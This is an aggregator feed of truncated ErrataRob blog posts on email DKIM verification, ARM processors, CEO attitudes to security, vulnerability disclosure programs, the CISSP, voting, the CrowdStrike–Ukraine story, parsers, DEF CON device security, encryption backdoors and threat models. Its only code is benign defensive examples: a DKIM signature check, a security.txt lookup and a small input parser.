Crypto works. The only way to bypass these signatures is to hack into the servers. In other words, when we see a 6-year-old message with a valid Gmail signature, we know either (a) it's valid or (b) they hacked into Gmail to steal the signing key. Since (b) is extremely unlikely -- and if they could hack Google, they could do a ton of more important things with that access -- we have to assume (a).

Your email client normally hides this metadata from you, because it's boring and humans rarely want to see it. But it's still there in the original email document. An email message is simply a text document consisting of metadata followed by the message contents. It takes no special skills to see the metadata. If the person has enough skill to export the email to a PDF document, they have enough skill to export the email source. If they can upload the PDF to Scribd (as in the story), they can upload the email source. I show how to below.

To show how this works, I sent an email using Gmail to my private email server (from gmail.com to robertgraham.com). The NYPost story shows the email printed as a PDF document. Thus, I do the same thing when the email arrives on my MacBook, using the Apple "Mail" app. The "raw" form originally sent from my Gmail account is simply a text document. This is rather simple. Clients insert details like a "Message-ID" that humans don't care about. There are also internal formatting details, like the fact that this is a "plain text" message rather than an "HTML" email.

But this raw document was the one sent by the Gmail web client. It then passed through Gmail's servers, then was passed across the Internet to my private server, where I finally retrieved it using my MacBook. As email messages pass through servers, the servers add their own metadata. When it arrived, none of the important bits had changed, but a lot more metadata had been added:

Tags: Hack, Guideline
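As a sketch of how such a check can be automated, the Python below verifies the DKIM signature on an exported raw message using the third-party dkimpy package (pip install dkimpy). The filename is hypothetical, and verification needs network access to fetch the sender's public key from DNS.

```python
# Minimal sketch of checking the DKIM signature in an email's metadata,
# using the third-party "dkimpy" package. Assumes you exported the raw
# message source, as described above; "message.eml" is a placeholder.

import dkim  # from the dkimpy package

with open("message.eml", "rb") as f:
    raw = f.read()

# dkim.verify() fetches the signer's public key from DNS and checks
# that the signed headers and body are unaltered since signing.
if dkim.verify(raw):
    print("valid signature: sender and contents check out")
else:
    print("bad or missing signature")
```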
ErrataRob 2020-10-08 21:44:25 Factcheck: Regeneron's use of embryonic stem cells (direct link)

This week, Trump's opponents misunderstood a Regeneron press release to conclude that the REGN-COV2 treatment (which may have saved his life) was created from stem cells. When that was proven false, his opponents nonetheless deliberately misinterpreted events to conclude there was still an ethical paradox. I've read the scientific papers, and it seems like this is an issue that can be understood with basic high-school science, so I thought I'd write up a detailed discussion.

The short answer is this:

The drug is not manufactured in any way from human embryonic tissues.
The drug was tested using fetal/embryonic cells, but ones almost 50 years old, not new ones.
Republicans want to stop using new embryos; the ethical issue here is the continued use of old embryos, which Republicans have consistently agreed to.
Yes, the drug is still tainted by the "embryonic stem cell" issue -- just not in any of the ways that people claim it is, and not in a way that makes Republicans inconsistent.
Almost all medical advances of the last few decades are similarly tainted.

Now let's do the long, complicated answer. This starts with a discussion of the science of Regeneron's REGN-COV2 treatment.

A well-known treatment that goes back decades is to take blood plasma from a recently recovered patient and give it to a recently infected patient. Blood plasma is the blood with the blood cells removed, leaving behind water, salts, other particles, and most importantly, "antibodies". This is the technical concept behind the movie "Outbreak", though of course they completely distort the science.

Antibodies are produced by the immune system to recognize and latch onto foreign things, including viruses (the rest of this discussion assumes viruses). They either deactivate the virus particle, or mark it to be destroyed by other parts of the immune system, or both. After an initial infection, it takes a while for the body to produce antibodies, allowing the disease to rage unchecked. A massive injection of antibodies during this time allows the disease to be stopped before it gets very far, letting the body's own defenses catch up. That's the premise behind Trump's treatment.

An alternative to harvesting natural antibodies from recently recovered patients is to manufacture artificial antibodies using modern science. That's what Regeneron did.

An antibody is just another "protein", one of the building blocks of the body. The protein is in the shape of a Y, with the two upper tips formed to lock onto the corresponding parts of a virus ("antigens"). Every new virus requires a new antibody with different tips. The SARS-COV-2 virus has these "spike" proteins on its surface that allow it to invade the cells in our lungs. They act like a crowbar, jamming themselves into the cell wall, then opening up a hole to allow the rest of the virus inside. Since this is the important and unique prote

Tags: Guideline
ErrataRob 2020-07-19 17:07:57 How CEOs think (direct link)

Recently, Twitter was hacked. CEOs who read about this in the news ask how they can protect themselves from similar threats. The following tweet expresses our frustration with CEOs: they don't listen to their own people, but instead want to buy a magic pill (a product) or listen to outside consultants (like Gartner). In this post, I describe how CEOs actually think.

CEO : "I read about that Twitter hack. Can that happen to us?"
Security : "Yes, but ..."
CEO : "What products can we buy to prevent this?"
Security : "But ..."
CEO : "Let's call Gartner."
*sobbing sounds*
- Wim Remes (@wimremes) July 16, 2020

The only thing more broken than how CEOs view cybersecurity is how cybersecurity experts view cybersecurity. We have this flawed view that cybersecurity is a moral imperative, that it's an end in itself. We are convinced that people are wrong for not taking security seriously. This isn't true. Security isn't a moral issue but simple cost vs. benefits, risk vs. rewards. Taking risks is more often the correct answer than having more security.

Rather than experts dispensing unbiased advice, we've become advocates/activists, trying to convince people that they need to do more to secure things. This activism has destroyed our credibility in the boardroom. Nobody thinks we are honest. Most of our advice is actually internal political battles. CEOs trust outside consultants mostly because outsiders don't have a stake in internal politics. Thus, the consultant can say the same thing as what you say, but be trusted.

CEOs view cybersecurity the same way they view everything else about building the business, from investment in office buildings, to capital equipment, to HR policies, to marketing programs, to telephone infrastructure, to law firms, to ... everything. They divide their business into two parts. The first is the part they do well, the thing they are experts at, the things that define who they are as a company, their competitive advantage. The second is everything else, the things they don't understand.

For the second part, they just want to be average in their industry, or at best, slightly above average. They want their manufacturing costs to be about average. They want the salaries paid to employees to be about average. They want the same video conferencing system as everybody else. Everything outside of core competency is average.

I can't express this enough: if it's not their core competency, then they don't want to excel at it. Excelling at a thing comes with a price. They have to pay people more. They have to find the leaders with proven track records at excelling at it. They have to manage excellence. This goes all the way to the top. If it's something the company is going to excel at, then the CEO at the top has to have enough expertise themselves to understand who the best leaders are to accomplish this goal. The CEO can't hire an excellent CSO unless they have enough competency to judge the qualifications of the CSO, and enough competency to hold the CSO accountable for the job they are doing.

All this is a tradeoff. A focus of attention on one part of the business means less attention on other parts of the business. If your company excels at cybersecurity, it means not excelling at some other part of the business. So unless you are a company like Google, whose cybersecurity is a competitive advantage, you don't want to excel in cybersecurity. You want to be

Tags: Ransomware, Guideline, NotPetya
ErrataRob 2020-06-16 18:38:07 Apple ARM Mac rumors (direct link)

The latest rumor is that Apple is going to announce Macintoshes based on ARM processors at their developer conference. I thought I'd write up some perspectives on this.

It's different this time

This would be Apple's fourth transition. Their original Macintoshes in 1984 used Motorola 68000 microprocessors. They moved to IBM's PowerPC in 1994, then to Intel's x86 in 2005. However, this history is almost certainly the wrong way to look at the situation. In those days, Apple had little choice. Each transition happened because the processor they were using was failing to keep up with technological change. They had no choice but to move to a new processor.

This no longer applies. Intel's x86 is competitive on both speed and power efficiency. It's not going away. If Apple transitions away from x86, they'll still be competing against x86-based computers. Other companies have chosen to adopt both x86 and ARM, rather than one or the other. Microsoft's "Surface Pro" laptops come in either x86 or ARM versions. Amazon's AWS cloud servers come in either x86 or ARM versions. Google's Chromebooks come in either x86 or ARM versions. Instead of ARM replacing x86, Apple may be attempting to provide both as options, possibly an ARM CPU for cheaper systems and an x86 for more expensive and more powerful systems.

ARM isn't more power efficient than x86

Every news story, every single one, is going to repeat the claim that ARM chips are more power efficient than Intel's x86 chips. Some will claim it's because they are RISC whereas Intel is CISC. This isn't true. RISC vs. CISC was a principle in the 1980s, when chips were so small that instruction set differences meant architectural differences. Since 1995, with "out-of-order" processors, the instruction set has been completely separated from the underlying architecture. Instruction set differences account for at most 5% of the difference between processors in performance or efficiency.

Mobile chips consume less power by simply being slower. When you scale mobile ARM CPUs up to desktop speeds, they consume the same power as desktops. Conversely, when you scale Intel x86 processors down to mobile power consumption levels, they are just as slow. You can test this yourself by comparing Intel's mobile-oriented "Atom" processor against ARM processors in the Raspberry Pi.

Moreover, the CPU accounts for only a small part of overall power consumption. Mobile platforms care more about the graphics processor or video acceleration than they do the CPU. Large differences in CPU efficiency mean small differences in overall platform efficiency. Apple certainly balances its chips so they work better in phones than an Intel x86 would, but these tradeoffs mean they'd work worse in laptops. While overall performance and efficiency will be similar, specific applications will perform differently. Thus, when ARM Macintoshes arrive, people will choose just the right benchmarks to "prove" their inherent superiority. It won't be true, but everyone will believe it to be true.

No longer a desktop company

Venture capitalist Mary Meeker produces yearly reports on market trends. The desktop computer market has been stagnant for over a decade in the face of mobile growth. The Macintosh is only 10% of Apple's business -- so little that they could abandon the business without noticing a difference. This means investing in the Macintosh business is a poor business decision. Such investment isn't going to produce growth. Investing in a major transition from x86 to ARM is therefore stupid -- it'll cost a lot of money without generating any return. In particular, despite having a mobile CPU for their iPhone, they still don't have a CPU optimized for laptops and desktops. The Macintosh market is just too small to fund

Tags: Guideline
ErrataRob 2020-05-19 18:03:23 Securing work-at-home apps (direct link)

In today's post, I answer the following question: "Our customer's employees are now using our corporate application while working from home. They are concerned about security, protecting their trade secrets. What security feature can we add for these customers?"

The tl;dr answer is this: don't add gimmicky features. Instead, take this opportunity to do the security things you should already be doing, starting with a "vulnerability disclosure program" or "vuln program".

Gimmicks

First of all, I'd like to discourage you from adding security gimmicks to your product. You are no more likely to come up with an exciting new security feature on your own than you are to come up with a miracle cure for covid. Your sales and marketing people may get excited about the feature, and they may get the customer excited about it too, but the excitement won't last. Eventually, the customer's IT and cybersecurity teams will be brought in. They'll quickly identify your gimmick as snake oil, and you'll have made an enemy of them. They are already involved in securing the server side, the work-at-home desktop, the VPN, and all the other network essentials. You don't want them as your enemy, you want them as your friend. You don't want to send your salesperson into the maw of a technical meeting at the customer's site trying to defend the gimmick.

You want to take the opposite approach: do something that the decision maker on the customer side won't necessarily understand, but which their IT/cybersecurity people will get excited about. You want them in the background as your champion rather than as your opposition.

Vulnerability disclosure program

To accomplish the goal described above, the thing you want is known as a vulnerability disclosure program. If there's one thing that the entire cybersecurity industry agrees on (other than hating the term cybersecurity, preferring "infosec" instead), it's that you need this vulnerability disclosure program. Everything else you might want to do to add security features to your product comes after you have this thing.

Your product has security bugs, known as vulnerabilities. This is true of everyone, no matter how good you are. Apple, Microsoft, and Google employ the brightest minds in cybersecurity and they have vulnerabilities. Every month you update their products with the latest fixes for these vulnerabilities. I just bought a new MacBook Air and it's already telling me I need to update the operating system to fix the bugs found after it shipped.

These bugs come mostly from outsiders. These companies have internal people searching for such bugs, as well as consultants, and do a good job quietly fixing what they find. But this goes only so far. Outsiders have a wider set of skills and perspectives than the companies could ever hope to control themselves, so they find things that the companies miss. These outsiders are often not customers.

This has been a chronic problem throughout the history of computers. Somebody calls up your support line and tells you there's an obvious bug that hackers can easily exploit. The customer support representative then ignores this because they aren't a customer. It's foolish wasting time adding features to a product that no customer is asking for. But then this bug leaks out to the public, hackers widely exploit it, damaging customers, and angry customers now demand to know why you did nothing to fix the bug despite having been notified about it.

The problem here is that nobody has the job of responding to such reports. The reason your company dropped the ball was that nobody was assigned to pick it up. All a vulnerability disclosure program means is that at least one person within the company has the responsibility of dealing with it.

How to set up a vulnerability disclosure program

Tags: Spam, Vulnerability, Threat, Guideline ★★★
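One concrete, low-effort first step, a common industry convention rather than something this post's (truncated) text prescribes, is publishing a security contact at /.well-known/security.txt per RFC 9116, so outside researchers know whom to tell. Here is a minimal Python check for one, with example.com as a placeholder domain.

```python
# Check whether a site publishes a vulnerability-disclosure contact at
# the RFC 9116 location. example.com is a placeholder; this is a
# sketch of the convention, not a requirement from the post itself.

import urllib.request

url = "https://example.com/.well-known/security.txt"
try:
    with urllib.request.urlopen(url, timeout=10) as resp:
        print(resp.read().decode())  # e.g. "Contact: mailto:security@..."
except Exception as err:
    print(f"no security.txt found: {err}")
```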
ErrataRob 2020-05-13 15:31:34 CISSP is at most equivalent to a 2-year associates degree (direct link)

There are few college programs for "cybersecurity". Instead, people rely upon industry "certifications", programs that attempt to certify that a person has the requisite skills. The most popular is known as the "CISSP". In the news today, European authorities decided the CISSP was "equivalent to a masters degree". I think this news is garbled. Looking into the details, studying things like "UK NARIC RQF level 11", it seems instead that the equivalency isn't with master's "degrees" so much as with post-graduate professional awards and certifications that are common in industry. Even then, it places the CISSP at too high a level: it's an entry-level certification that doesn't require a college degree, and teaches students only familiarity with the buzzwords used in the industry rather than a deeper understanding of how things work.

Recognition of equivalent qualifications and skills

The outrage over this has been about "equivalent to a master's degree". I don't think this is the case. Instead, it seems "equivalent to professional awards and recognition". The background behind this is how countries recognize "equivalent" work done in other countries. For example, a German Diplom from a university is a bit more than a U.S. bachelor's degree, but a bit less than a U.S. master's degree. How, then, do you find an equivalence between the two? Part of this is occupational, vocational, and professional awards, certifications, and other forms of recognition. A lot of practical work experience is often equivalent to, and even better than, academic coursework.

The press release here discusses the UK's NARIC RQF framework, putting the CISSP at level 11. This makes it equivalent to post-graduate coursework and various forms of professional recognition. I'm not sure it means it's the same as a "master's degree". At RQF level 11, there is a fundamental difference between an "award" requiring up to 120 hours of coursework, a "certificate", and a "degree" requiring more than 370 hours of coursework. Assuming everything else checks out, this would place the CISSP at the "award" level, not the "certificate" or "degree" level. The question here is whether the CISSP deserves recognition along with other professional certifications. Below I will argue that it doesn't.

Superficial, not technical

The CISSP isn't a technical certification. It covers all the buzzwords in the industry so you know what they refer to, but doesn't explain how anything works. You are tested on the definition of the term "firewall" but you aren't tested on any detail about how firewalls work. This has an enormous impact on the cybersecurity industry, with hordes of "certified" professionals who are nonetheless non-technical, not knowing how things work. This places the CISSP clearly at some lower RQF level. RQF level 11 is reserved for people with a superior understanding of how things work, whereas the CISSP is really an entry-level certification.

No college degree required

The other certifications at this level tend to require a college degree. They are a refinement of what was learned in college. The opposite is true of the CISSP. It requires no college degree. Now, I'm not a fan of college degrees. Idiots seem capable of getting such degrees without understanding the content, so they are not a good badge of expertise. But at least the majority of college programs take students deeper into understanding the theory of how things work rat

Tags: Guideline
ErrataRob.webp 2020-03-04 15:05:04 A requirements spec for voting (lien direct) In software development, we start with a "requirements specification" defining what the software is supposed to do. Voting machine security is often in the news, with suspicion that the Russians are trying to subvert our elections. Would blockchain or mobile phone voting work? I don't know. These things have tradeoffs that may or may not work, depending upon what the requirements are. I haven't seen the requirements written down anywhere. So I thought I'd write some. One requirement is that the results of an election must seem legitimate. That's why responsible candidates give a "concession speech" when they lose. When John McCain lost the election to Barack Obama, he started his speech with: "My friends, we have come to the end of a long journey. The American people have spoken, and they have spoken clearly. A little while ago, I had the honor of calling Sen. Barack Obama - to congratulate him on being elected the next president of the country that we both love." This was important. Many of his supporters were pointing out irregularities in various states, wanting to continue the fight. But there are always irregularities, or things that look like irregularities. In every election, if a candidate really wanted to, they could drag out an election indefinitely investigating these irregularities. Responsible candidates therefore concede with such speeches, telling their supporters to stop fighting. It's one of the problematic things in our current election system. Even before his likely loss to Hillary, Trump was already stirring up his voters to continue the fight after the election. He actually won that election, so the fight never occurred, but it was likely to occur. It's hard to imagine Trump ever conceding a fairly won election. I hate to single out Trump here (though he deserves criticism on this issue) because it seems these days both sides are convinced that the other side is cheating. The goal of adversaries like Putin's Russia isn't necessarily to get favored candidates elected, but to delegitimize the candidates who do get elected. As long as the opponents of the winner believe they have been cheated, then Russia wins. Is the actual requirement of election security that the elections are actually secure? Or is the requirement instead that they appear secure? After all, when two candidates each have nearly 50% of the real vote, it doesn't really matter which one has mathematical legitimacy. It matters more which has political legitimacy. Another requirement is that the rules be fixed ahead of time. This was the big problem in the Florida recounts in the 2000 Bush election. Votes had ambiguities, like hanging chads. The legislature came up with rules for how to resolve the ambiguities, and how to count the votes, after the votes had been cast. Naturally, the party in power that comes up with the rules will choose those that favor itself. The state of Georgia recently passed a law on election systems. Computer scientists in election security criticized the law because it didn't have their favorite approach, voter-verifiable paper ballots. Instead, the ballot printed a bar code. But the bigger problem with the law is that it left open what happens if tampering is discovered. If an audit of the paper ballots finds discrepancies, what happens then? The answer is that the legislature comes up with more rules.
You don't need to secretly tamper with votes; you can instead do so publicly, so that everyone knows the vote was tampered with. This then throws the problem to the state legislature to decide the victor. Even the most perfectly secured voting system proposed by academics doesn't solve the problem. It'll detect vote tampering, but doesn't resolve what happens when tampering is detected. What do you do with tampered votes? If you throw them out, it means one candidate wins. If you somehow fix them, it means the other candidate w Guideline
ErrataRob.webp 2019-12-13 16:50:17 This is finally the year of the ARM server (lien direct) "RISC" was an important architecture from the 1980s, when CPUs had fewer than 100,000 transistors. By simplifying the instruction set, they freed up transistors for more registers and better pipelining. It meant executing more instructions, but more than making up for this by executing them faster. But once CPUs exceeded a million transistors around 1995, they moved to Out-of-Order, superscalar architectures. OoO replaces RISC by decoupling the front-end instruction set from the back-end execution. A "reduced instruction set" no longer matters; the backend architecture differs little between Intel and competing RISC chips like ARM. Yet people have remained fixated on instruction set. The reason is simply politics. Intel has been the dominant instruction set for the computers we use on servers, desktops, and laptops. Many instinctively resist whoever dominates. In addition, colleges indoctrinate students on the superiority of RISC. Much college computer science instruction is decades out of date. For 10 years, the ignorant press has been championing the cause of ARM's RISC processors in servers. The refrain has always been that RISC has some inherent power-efficiency advantage, and that ARM processors, with natural power efficiency from the mobile world, will be more power efficient for the data center. None of this is true. There are plenty of RISC alternatives to Intel, like SPARC, POWER, and MIPS, and none of them ended up having a power-efficiency advantage. Mobile chips aren't actually power efficient. Yes, they consume less power, but only because they are slower. ARM's mobile chips have roughly the same computations-per-watt as Intel chips. When you scale them up to the same amount of computation as Intel's server chips, they end up consuming just as much power. People are essentially innumerate. They can't do this math (a toy version of the arithmetic appears at the end of this post). The only factor they know is that ARM chips consume less power. They can't factor into the equation that they are also doing fewer computations. There have been three attempts by chip makers to produce server chips to compete against Intel. The first attempt was the "flock of chickens" approach. Instead of one beefy OoO core, you make a chip with a bunch of wimpy traditional RISC cores. That's not a bad design for highly parallel, large-memory workloads. Such workloads spread themselves efficiently across many CPUs, and spend a lot of time halted, waiting for data to be returned from memory. But such chips didn't succeed in the market. The basic reason was that interconnecting all the cores introduced so much complexity and power consumption that it wasn't worth the effort. The second attempt was multi-threaded chips. Intel's chips support two threads per core, so that when one thread halts waiting for memory, the other thread can continue processing what's already stored in cache and in registers. It's a cheap way for processors to increase effective speed while adding few additional transistors to the chip. But it has decreasing marginal returns, which is why Intel only supports two threads. Vendors created chips with as many as 8 threads per core. Again, they were chasing the highly parallel workloads that waited on memory. With multithreaded chips, though, they could avoid all that interconnect nastiness. This still didn't work.
The chips were quite good, but it turns out that these workloads are only a small portion of the market. Finally, chip makers decided to compete head-to-head with Intel by creating server chips optimized for the same workloads as Intel, with fast single-threaded performance. A good example was Qualcomm, which created a server chip that CloudFlare promised to use. They announced this to much fanfare, then abandoned it a few months later as nobody adopted it. The reason was simply that when you scale to Intel-like performance, you get Intel-like liabilities. Your only customers are the innumerate who can't do math, who believe like emperors Guideline
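To put toy numbers on the efficiency argument above (round hypothetical figures, not measurements):
mobile chip:   100 billion ops/sec at   5 watts = 20 billion ops per watt
server chip:  2000 billion ops/sec at 100 watts = 20 billion ops per watt
The mobile chip "consumes less power" only because it does a twentieth of the work; scale it up to server throughput and it burns the same 100 watts.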
ErrataRob.webp 2019-09-26 13:24:44 CrowdStrike-Ukraine Explained (lien direct) Trump's conversation with the President of Ukraine mentions "CrowdStrike". I thought I'd explain this.
What was said?
This is the text from the conversation covered in this: “I would like you to find out what happened with this whole situation with Ukraine, they say Crowdstrike... I guess you have one of your wealthy people... The server, they say Ukraine has it.” Personally, I occasionally interrupt myself while speaking, so I'm not sure I'd criticize Trump here for his incoherence. But at the same time, we aren't quite sure what was meant. It's only meaningful in the greater context. Trump has talked before about CrowdStrike's investigation being wrong, a rich Ukrainian owning CrowdStrike, and a "server". He's talked a lot about these topics before.
Who is CrowdStrike?
They are a cybersecurity firm that, among other things, investigates hacker attacks. If you've been hacked by a nation state, then CrowdStrike is the sort of firm you'd hire to come and investigate what happened, and help prevent it from happening again.
Why is CrowdStrike mentioned?
Because they were the lead investigators in the DNC hack who came to the conclusion that Russia was responsible. The pro-Trump crowd believes this conclusion is false. If the conclusion is false, then it must mean CrowdStrike is part of the anti-Trump conspiracy. Trump has always had a thing for CrowdStrike since their first investigation. It's intensified since the Mueller report, which solidified the ties between Trump and Russia, and between Russia and the DNC hack. Personally, I'm always suspicious of such investigations. Politics, either grand (on this scale) or small (internal company politics), seems to drive investigations, creating firm conclusions based on flimsy evidence. But CrowdStrike has made public some pretty solid information, such as Bitly accounts used both in the DNC hacks and against other (known) targets of state-sponsored Russian hackers. Likewise, the Mueller report had good data on Bitcoin accounts. I'm sure if I looked at all the evidence, I'd have more doubts, but at the same time, of the politicized hacking incidents out there, this one seems to have the best (public) support for its conclusion.
What's the conspiracy?
The basis of the conspiracy is that the DNC hack was actually an inside job. Some former intelligence officials led by Bill Binney claim they looked at some data and found that the files were copied "locally" instead of across the Internet, and that therefore it was an insider who did it and not a remote hacker. I debunk the claim here, but the short explanation is: of course the files were copied "locally", the hacker was inside the network. In my long experience investigating hacker intrusions, and performing them myself, I know this is how it's normally done. I mention my own experience because I'm technical and know these things, in contrast with Bill Binney and those other intelligence officials who have no experience with such things. He sounds impressive, being formerly of the NSA, but he was a mid-level manager in charge of budgets. Binney has never performed a data breach investigation, and has never performed a pentest. There are other parts to the conspiracy. In the middle of all this, a DNC staffer was murdered on the street, possibly due to a mugging. Naturally this gets included as part of the conspiracy: this guy ("Seth Rich") must've been the "insider" in this attack, and mus Data Breach Hack Guideline NotPetya
ErrataRob.webp 2019-08-31 10:18:49 Thread on network input parsers (lien direct) This blogpost contains a long Twitter thread on input parsers. I thought I'd copy the thread here as a blogpost.
I am spending far too long on this chapter on "parsers". It's this huge gaping hole in Computer Science where academics don't realize it's a thing. It's like physics missing one of Newton's laws, or medicine ignoring broken bones, or chemistry ignoring fluorine. The problem is that without existing templates of how "parsing" should be taught, it's really hard coming up with a structure for describing it from scratch. "Langsec" has the best model, but at the same time, it's a bit abstract ("input is a language that drives computation"), so I want to ease into it with practical examples for programmers (a minimal example of the style appears below).
Guideline
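The thread itself (a series of embedded tweets) isn't reproduced above, but a minimal sketch of the byte-at-a-time, state-machine style of parser that langsec favors might look like the following C. This is my illustration, not code from the thread; the grammar (an unsigned decimal number terminated by a newline) and all names are invented for the example.
#include <stdint.h>
#include <stddef.h>

/* All parser state lives in one struct, so input can arrive in
 * arbitrary fragments and parsing resumes where it left off. */
enum pstate { START, DIGITS, DONE, FAIL };
struct parser {
    enum pstate state;
    uint32_t value;
};

/* Feed one buffer of untrusted bytes; returns the count consumed. */
static size_t parse(struct parser *p, const unsigned char *buf, size_t len)
{
    size_t i;
    for (i = 0; i < len; i++) {
        unsigned char c = buf[i];
        switch (p->state) {
        case START:
            if (c >= '0' && c <= '9') {
                p->value = c - '0';
                p->state = DIGITS;
            } else {
                p->state = FAIL;
            }
            break;
        case DIGITS:
            if (c >= '0' && c <= '9') {
                if (p->value > (UINT32_MAX - (c - '0')) / 10)
                    p->state = FAIL;        /* reject integer overflow */
                else
                    p->value = p->value * 10 + (c - '0');
            } else if (c == '\n') {
                p->state = DONE;            /* number complete */
            } else {
                p->state = FAIL;
            }
            break;
        case DONE:
        case FAIL:
            return i;                       /* stop consuming input */
        }
    }
    return i;
}
The point of the style is that every byte is checked against an explicit grammar before it influences anything, and there is no intermediate buffer for the input to overflow.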
ErrataRob.webp 2019-08-04 18:52:45 Securing devices for DEFCON (lien direct) There's been much debate whether you should get burner devices for hacking conventions like DEF CON (phones or laptops). A better discussion would be to list those things you should do to secure yourself before going, just in case. These are the things I worry about:
backup before you go
update before you go
correctly locking your devices with full disk encryption
correctly configuring WiFi
Bluetooth devices
mobile phone vs. Stingrays
USB
Backup
Traveling means a higher chance of losing your device. In my review of crime statistics, theft seems less of a threat in Las Vegas than in whatever city you are coming from. My guess is that while thieves may want to target tourists, the police want, even more, to target gangs of thieves, to protect the cash cow that is the tourist industry. But you are still more likely to accidentally leave a phone in a taxi or have your laptop crushed in the overhead bin. If you haven't recently backed up your device, now would be an extra useful time to do this. Anything I want backed up on my laptop is already in Microsoft's OneDrive, so I don't pay attention to this. However, I have a lot of pictures on my iPhone that I don't have in iCloud, so I copy those off before I go.
Update
Like most of you, I put off updates unless they are really important, updating every few months rather than every month. Now is a great time to make sure you have the latest updates. Backup before you update, but then, I already mentioned that above.
Full disk encryption
This is enabled by default on phones, but not the default for laptops. It means that if you lose your device, adversaries can't read any data from it. You are at risk if you have a simple unlock code, like a predictable pattern or a 4-digit code. The longer and less predictable your unlock code, the more secure you are. I use iPhone's "face id" on my phone so that people looking over my shoulder can't figure out my passcode when I need to unlock the phone. However, because this enables the police to easily unlock my phone, by putting it in front of my face, I also remember how to quickly disable face id (by holding the buttons on both sides for 2 seconds). As for laptops, it's usually easy to enable full disk encryption. However, there are some gotchas. Microsoft requires a TPM for its BitLocker full disk encryption, which your laptop might not support. I don't know why all laptops don't just have TPMs, but they don't. You may be able to use some tricks to get around this. There are also third-party full disk encryption products that use simple passwords. If you don't have a TPM, then hackers can brute-force crack your password, trying billions per second. This applies to my MacBook Air, which is the 2017 model before Apple started adding their "T2" chip to all their laptops. Therefore, I need a strong login password. I deal with this on my MacBook by having two accounts. When I power on the device, I log into an account using a long/complicated password. I then switch to a second account with a simpler password for going in/out of sleep mode. This second account can't be used to decrypt the drive. On Linux, my password to decrypt the drive is similarly long, while the user account password is pretty short. I ignore the "evil maid" threat, because my devices are always with me rather than in Hack Threat Guideline
ErrataRob.webp 2019-07-28 15:21:32 Why we fight for crypto (lien direct) This last week, Attorney General William Barr called for crypto backdoors. His speech is a fair summary of law enforcement's side of the argument. In this post, I'm going to address many of his arguments. The tl;dr version of this blog post is this:
First, their claims of mounting crime are unsubstantiated, based on emotional anecdotes rather than statistics. We live in a Golden Age of Surveillance where, if any balancing is to be done in the privacy vs. security tradeoff, it should be in favor of more privacy.
Second, we aren't talking about a tradeoff with privacy alone, but with other rights. In particular, it's every bit as important to protect the right of political dissidents to keep some communications private (encryption) as it is to allow them to make other communications public (free speech). In addition, there is no solution to the "going dark" problem that doesn't restrict the freedom to run arbitrary software of the user's choice on their computers/phones.
Third, there is the problem of technical feasibility. We don't know how to make backdoors available for law enforcement access without enormously reducing security for users.
Balance
The crux of his argument is balancing civil rights vs. safety, also described as privacy vs. security. This balance is expressed in the constitution by the Fourth Amendment. The Fourth Amendment doesn't express an absolute right to privacy, but allows police to invade your privacy if they can show an independent judge that they have "probable cause". By making communications "warrant proof", encryption creates a "law free zone" enabling crime to be conducted without the ability of the police to investigate. It's a reasonable argument. If your child gets kidnapped by sex traffickers, you'll be demanding the police do something, anything, to get your child back safe. If a phone is found at the scene, you'll definitely want them to have the ability to decrypt the phone, as long as a judge gives them a search warrant to balance civil liberty concerns. However, this argument is wrong, as I'll discuss below.
Law free zones
Barr claims encryption creates a new "law free zone ... giving criminals the means to operate free of lawful scrutiny". He pretends that such zones never existed before. Of course they've existed before. Attorney-client privilege is one example, which is definitely abused to further crime. Barr's own boss has committed obstruction of justice, hiding behind the law-free zone of Article II of the constitution. We are surrounded by legal loopholes that criminals exploit in order to commit crimes, where the cost of closing the loophole is greater than the benefit. The biggest "law free zone" that exists is just the fact that we don't live in a universal surveillance state. I think impure thoughts without the police being able to read my mind. I can whisper quietly in your ear at a bar without the government overhearing. I can invite you over to my house to plot nefarious deeds in my living room. Technology didn't create these zones. However, technological advances are allowing police to defeat them. Businesses have security cameras everywhere. Neighborhood associations are installing license plate readers. We are putting Echo/OkGoogle/Cortana/Siri devices in our homes, listening to us. Our phones and computers have microphones and cameras.
Our TVs increasingly have cameras and mics too, in case we want to use them for video conferencing, or to give them voice commands. Every argument Barr makes about crypto backdoors applies to backdoor access to microphones; every argument applies to forcing TVs to have a backdoor allowing police armed with a warrant to turn on the camera in your living room. These Guideline
ErrataRob.webp 2019-05-29 20:16:09 Your threat model is wrong (lien direct) Several subjects have come up in the past week that all come down to the same thing: your threat model is wrong. Instead of addressing the threat that exists, you've morphed the threat into something else that you'd rather deal with, or which is easier to understand.
Phishing
An example is this question that misunderstands the threat of "phishing":
Should failing multiple phishing tests be grounds for firing? I ran into a guy at a recent conference, said his employer fired people for repeatedly falling for (simulated) phishing attacks. I talked to experts, who weren't wild about this disincentive. https://t.co/eRYPZ9qkzB pic.twitter.com/Q1aqCmkrWL - briankrebs (@briankrebs) May 29, 2019
The (wrong) threat model here is that phishing is an email that smart users with training can identify and avoid. This isn't true. Good phishing messages are indistinguishable from legitimate messages. Said another way, a lot of legitimate messages are in fact phishing messages, such as when HR sends out a message saying "log into this website with your organization username/password".
Recently, my university sent me an email for mandatory Title IX training, not digitally signed, with an external link to the training, that requested my university login creds for access, that was sent from an external address but from the Title IX coordinator. - Tyler Pieron (@tyler_pieron) May 29, 2019
Yes, it's amazing how easily stupid employees are tricked by the most obvious of phishing messages, and you want to point and laugh at them. But frankly, you want the idiot employees doing this. The more obvious phishing attempts are the least harmful and a good test of the rest of your security -- which should be based on the assumption that users will frequently fall for phishing. In other words, if you paid attention to the threat model, you'd be mitigating the threat in other ways and not even bothering to train employees. You'd be firing HR idiots for phishing employees, not punishing employees for getting tricked. Your systems would be resilient against successful phishes, such as by using two-factor authentication.
IoT security
After the Mirai worm, government types pushed for laws to secure IoT devices, as billions of insecure devices like TVs, cars, security cameras, and toasters are added to the Internet. Everyone is afraid of the next Mirai-type worm. For example, they are pushing for devices to be auto-updated. But auto-updates are a bigger threat than worms. Since Mirai, roughly 10-billion new IoT devices have been added to the Internet, yet there hasn't been a Mirai-sized worm. Why is that? After 10-billion new IoT devices, it's still Windows and not IoT that is the main problem. The answer is that number, 10-billion. Internet worms work by guessing IPv4 addresses, of which there are only 4-billion. You can't have 10-billion new devices on the public IPv4 addresses because there simply aren't enough addresses. Instead, those 10-billion devices are almost entirely being put on private ne Ransomware Tool Vulnerability Threat Guideline FedEx NotPetya
